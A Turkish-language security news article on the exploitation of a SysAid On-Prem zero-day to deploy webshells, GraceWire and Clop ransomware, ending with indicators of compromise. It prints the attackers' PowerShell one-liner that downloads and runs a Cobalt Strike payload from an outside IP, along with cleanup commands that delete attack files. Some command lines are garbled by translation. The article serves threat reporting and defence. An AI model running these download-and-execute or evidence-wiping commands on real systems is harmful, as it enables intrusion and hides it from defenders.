SysAid BT Hizmet Yazılımı, Fidye Yazılımını Dağıtmak İçin 0 Günlük Suistimal Edildi

SysAid On-Prem yazılımının, olay müdahale incelemesi sırasında belirlenen 0 günlük bir güvenlik açığı olduğu bildirildi.

Microsoft’a göre saldırganlar, kurumsal sunuculara sızmak, hassas verileri çalmak ve meşhur Clop fidye yazılımını dağıtmak için bu sıfır gün güvenlik açığından yararlanıyor.

Bu rapor, şirketlerin değerli varlıklarını kötü niyetli saldırılardan korumak için siber güvenlik önlemlerine öncelik vermelerinin acil ihtiyacını vurguluyor.

SysAid, bir kuruluş genelinde BT hizmet yönetimi iş akışlarını kolaylaştırmak ve geliştirmek için tasarlanmış güçlü ve çok yönlü bir yazılım çözümüdür.

Çok çeşitli BT hizmetlerinin verimli ve etkili yönetimini sağlayan, kesintisiz operasyonlar ve gelişmiş üretkenlik sağlayan kapsamlı bir araç ve özellikler paketi sunar.

SysAid, güvenlik açığı üzerine hızlı bir şekilde harekete geçti ve azaltma çözümüyle iletişime geçti. Ayrıca yazılımın bu güvenlik açığını gideren yükseltilmiş bir sürümü de yayımlandı.

Güvenlik açığı Path Traversal ile ilişkilendirildi ve SysAid şirket içi yazılımında uzaktan kod yürütülmesine yol açtı.

Ancak bu güvenlik açığından Lace Tempest olarak bilinen bir tehdit grubu yararlandı. Tehdit aktörleri, WebShell ve diğer yükleri içeren bir WAR arşivini SysAid Tomcat web hizmetinin web köküne yüklediler.

SysAid BT Yazılımında 0 Günlük Kusur

WebShell, tehdit aktörüne, tehlikeye atılan sistem üzerinde yetkisiz erişim ve kontrol sağladı; tehdit aktörü, user.exe adı altında kötü amaçlı yazılım yükleyicisini çalıştıran bir PowerShell komut dosyasını yürütmek için bu sistemi kullandı.

Bu, spoolsv.exe, msiexec.exe veya svchost.exe işlemlerine enjekte edilen GraceWire truva atını yüklemek için kullanıldı.

Tehdit aktörü ilk erişimi elde edip kötü amaçlı yazılımı dağıttıktan sonra, diskteki ve web günlüklerindeki etkinlikleriyle ilişkili tüm izleri temizlemek için ikinci bir PowerShell betiği kullandı. Ayrıca tehdit aktörleri, truva atının yanı sıra MeshAgent uzaktan yönetim aracını da kullandı.

PowerShell Komut Dosyası Analizi

Kullanılan ilk PowerShell betiği, aynı zamanda C:\Program Files\SysAidServer\tomcat\webapps\usersfiles dizinine yerleştirilen tüm dosyaları listeleyen ve userfiles.war dosyası da dahil olmak üzere saldırı sırasında kullanılan tüm dosyaları kaldıran Kötü Amaçlı Yazılım yükleyicisini başlatmaktı. C:\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.* ile eşleşen tüm dosyalar

Kullanılan ikinci PowerShell betiği, istismarın tamamlanması için 5 saniye uyuyan ve SysAidServer\root\WEB-INF\logs ve SysAidServer\tomcat\logs dizinlerinde bulunan günlük dosyalarındaki tüm satırları kaldıran Kurban sunucularındaki kanıtları silmekti.

Daha sonraki eylemler için kurban ana bilgisayarında CobaltStrike dinleyicilerini indirip çalıştırmak için kullanılan üçüncü bir PowerShell betiği vardı.

Yararlanma, komut dosyası kodu ve diğer bilgiler hakkında ayrıntılı bilgi sağlayan eksiksiz bir rapor SysAid tarafından yayımlandı.

Uzlaşma Göstergeleri

Hash’ler

IP Adresleri

Dosya Yolları

Komutlar

Kobalt Saldırısı

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w gizli -c IEX ((new-object net.webclient).downloadstring(‘http://179.60.150[.]34:80/a’)

Uzlaşma Sonrası Temizleme

Öğeyi Kaldır -Yol “$tomcat_dir\webapps\usersfiles\leave”.
Remove-Item -“$wapps\usersfiles.war”ı zorla.
Remove-Item -“$wapps\usersfiles\user.*” komutunu zorlayın.
& “$wapps\usersfiles\user.exe”.

Antivirüs Algılamaları

Truva Atı:Win32/TurtleLoader
Arka kapı: Win32/Clop
Fidye: Win32/Clop

StorageGuard ile depolama ve yedekleme sistemlerinizi korur – 40 saniyelik Video Turunu izleyin.